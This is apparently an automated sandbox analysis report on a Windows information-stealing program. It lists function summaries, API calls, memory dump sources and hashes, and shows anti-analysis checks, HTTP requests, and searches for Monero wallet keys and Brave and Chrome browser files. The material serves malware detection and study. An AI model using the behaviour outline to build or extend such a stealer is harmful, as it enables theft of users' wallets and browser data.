                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 b86af3 1451 b86b0a 1450->1451 1453 b86aba-b86ad7 call b8aad0 OpenEventA 1451->1453 1454 b86b0c-b86b22 call b86920 call b85b10 CloseHandle ExitProcess 1451->1454 1460 b86ad9-b86af1 call b8aad0 CreateEventA 1453->1460 1461 b86af5-b86b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B86AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00B86AF9
                                • Sleep.KERNEL32(00001770), ref: 00B86B04
                                • CloseHandle.KERNEL32(?,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86B1A
                                • ExitProcess.KERNEL32 ref: 00B86B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: b26c65dac9c2f1476948facd1e1a4b2260ed459145c421cfb5600313ef2513db
                                • Instruction ID: bd2aa0afd0358578d6d88bb1e01a5d8f568b326052288c778164004ed0001a7e
                                • Opcode Fuzzy Hash: b26c65dac9c2f1476948facd1e1a4b2260ed459145c421cfb5600313ef2513db
                                • Instruction Fuzzy Hash: F9F03470A4430AEAE710BBA09C8ABBE7BB4EB04701F104695B512E12E1DBB15940DBA6
                                Function 00B747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 26c46732b1fc45a21cba12dda4ee4d1259aa117a9a306b32eaacfdef7cfbd8f0
                                • Instruction ID: 2c84ec9daa027a86a403ea00aa7a4f9a31e0d1891e59e1fdb213db5da5363223
                                • Opcode Fuzzy Hash: 26c46732b1fc45a21cba12dda4ee4d1259aa117a9a306b32eaacfdef7cfbd8f0
                                • Instruction Fuzzy Hash: AF2142B1D00209ABDF14DF54E845ADE7775FB44320F108669F515A72D0EB706605CF91
                                Function 00B851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B76280: InternetOpenA.WININET(00B90DFE,00000001,00000000,00000000,00000000), ref: 00B762E1
                                  • Part of subcall function 00B76280: StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76303
                                  • Part of subcall function 00B76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B76335
                                  • Part of subcall function 00B76280: HttpOpenRequestA.WININET(00000000,GET,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B76385
                                  • Part of subcall function 00B76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B763BF
                                  • Part of subcall function 00B76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B763D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: a8e64bbc5c737196e56236f2f3e33592ebd88d2dd25ba46f064d05691070e11c
                                • Instruction ID: 98b02294343ad2d874c1f4b128df6bfb448b2d75db869a059c590addb6ce1499
                                • Opcode Fuzzy Hash: a8e64bbc5c737196e56236f2f3e33592ebd88d2dd25ba46f064d05691070e11c
                                • Instruction Fuzzy Hash: 9D110330910148A7DB18FF64DD92AED77F8AF50300F4085D9F81A565A2EF35AB05D7A2
                                Function 00B71110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B7112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B71132
                                • ExitProcess.KERNEL32 ref: 00B71143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 30c2759cec72fa66938dd0d33ce8304d2ca2e06b2b38e2701346fdb140c3e532
                                • Instruction ID: 7cf3b22dd77344797e578a17a82a6ee93e22a5043ad09573261e48aec3e744b3
                                • Opcode Fuzzy Hash: 30c2759cec72fa66938dd0d33ce8304d2ca2e06b2b38e2701346fdb140c3e532
                                • Instruction Fuzzy Hash: A9E0E674949348FBE7106BA9DC0AB0976B8EB04B01F504594F709BA6D0D6B5264096B9
                                Function 00B710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B710B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00B710F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 3e97b3c5514f51ea3f12fdd35650ab063a5939ae465a4ae317a00597de24e809
                                • Instruction ID: ab61ce957f0eb807add10727631e035b8d2bda369e71cdadf96fc2f7651e09ea
                                • Opcode Fuzzy Hash: 3e97b3c5514f51ea3f12fdd35650ab063a5939ae465a4ae317a00597de24e809
                                • Instruction Fuzzy Hash: 01F0E271641308FBE7149AACAC49FAEB7ECE705B15F305988F504E3280D5719E00CAA0
                                Function 00B71190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87910
                                  • Part of subcall function 00B878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B87917
                                  • Part of subcall function 00B878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B8792F
                                  • Part of subcall function 00B87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B711B7), ref: 00B87880
                                  • Part of subcall function 00B87850: RtlAllocateHeap.NTDLL(00000000), ref: 00B87887
                                  • Part of subcall function 00B87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B8789F
                                • ExitProcess.KERNEL32 ref: 00B711C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 5ebd8b5a80d356fe8b133ae3e8337e1e8190b3ee6a284180fcbca8f9af6e0170
                                • Instruction ID: c798ea394ead71e2794b97dcce8805c902080c8ae59e38843490a2469cc6d0af
                                • Opcode Fuzzy Hash: 5ebd8b5a80d356fe8b133ae3e8337e1e8190b3ee6a284180fcbca8f9af6e0170
                                • Instruction Fuzzy Hash: 01E0C2B1914301E3CA0037FEAC0AB2A33CC9B00349F4409A4FA08D22A2FE25E800C776

                                Non-executed Functions

                                Function 00B838B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00B838CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B838E3
                                • lstrcat.KERNEL32(?,?), ref: 00B83935
                                • StrCmpCA.SHLWAPI(?,00B90F70), ref: 00B83947
                                • StrCmpCA.SHLWAPI(?,00B90F74), ref: 00B8395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B83C67
                                • FindClose.KERNEL32(000000FF), ref: 00B83C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 7115f0d304201231a1efbad17f39122c6bc426ca112e3676d819d26ab9cbda05
                                • Instruction ID: 4606b5e2c5d75d88063adf5fc6707011851dcc6b45a76c49fdc2d7999d776058
                                • Opcode Fuzzy Hash: 7115f0d304201231a1efbad17f39122c6bc426ca112e3676d819d26ab9cbda05
                                • Instruction Fuzzy Hash: 74A12FB1900318EBDB24EB64DC85FEE73B8FB48700F0446D8A50D96151EB759B84CF62
                                Function 00B7BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00B90B32,00B90B2B,00000000,?,?,?,00B913F4,00B90B2A), ref: 00B7BEF5
                                • StrCmpCA.SHLWAPI(?,00B913F8), ref: 00B7BF4D
                                • StrCmpCA.SHLWAPI(?,00B913FC), ref: 00B7BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00B7C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 685f058ff87aec0665d30f572564524201e781f7bf16fa4cceaf0010ddee516c
                                • Instruction ID: 5a04c6664b6c0047bfa831b627daed67bd34a012735a95cc97297af955113dfb
                                • Opcode Fuzzy Hash: 685f058ff87aec0665d30f572564524201e781f7bf16fa4cceaf0010ddee516c
                                • Instruction Fuzzy Hash: 91425672910104ABDB14FB74DD96EED73BCAF54300F4085D9F50AA61A1EE34AF49CBA2
                                Function 00B84910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00B8492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B84943
                                • StrCmpCA.SHLWAPI(?,00B90FDC), ref: 00B84971
                                • StrCmpCA.SHLWAPI(?,00B90FE0), ref: 00B84987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B84B7D
                                • FindClose.KERNEL32(000000FF), ref: 00B84B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 2a31cd1c81f7f8508d5302657044442a36d9255c4bbe3009cd82b63502b14e8b
                                • Instruction ID: cacf46554050c8952c9f82ae71f96439dc6321b7ed8669c0a940b499d78b1cac
                                • Opcode Fuzzy Hash: 2a31cd1c81f7f8508d5302657044442a36d9255c4bbe3009cd82b63502b14e8b
                                • Instruction Fuzzy Hash: FE6154B2910219EBCB24FBA4DC45FEA73BCBB48700F0486D8F60996151EB759B45CFA1
                                Function 00B84570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B84580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B84587
                                • wsprintfA.USER32 ref: 00B845A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B845BD
                                • StrCmpCA.SHLWAPI(?,00B90FC4), ref: 00B845EB
                                • StrCmpCA.SHLWAPI(?,00B90FC8), ref: 00B84601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B8468B
                                • FindClose.KERNEL32(000000FF), ref: 00B846A0
                                • lstrcat.KERNEL32(?,0093E220), ref: 00B846C5
                                • lstrcat.KERNEL32(?,0093D6F8), ref: 00B846D8
                                • lstrlen.KERNEL32(?), ref: 00B846E5
                                • lstrlen.KERNEL32(?), ref: 00B846F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
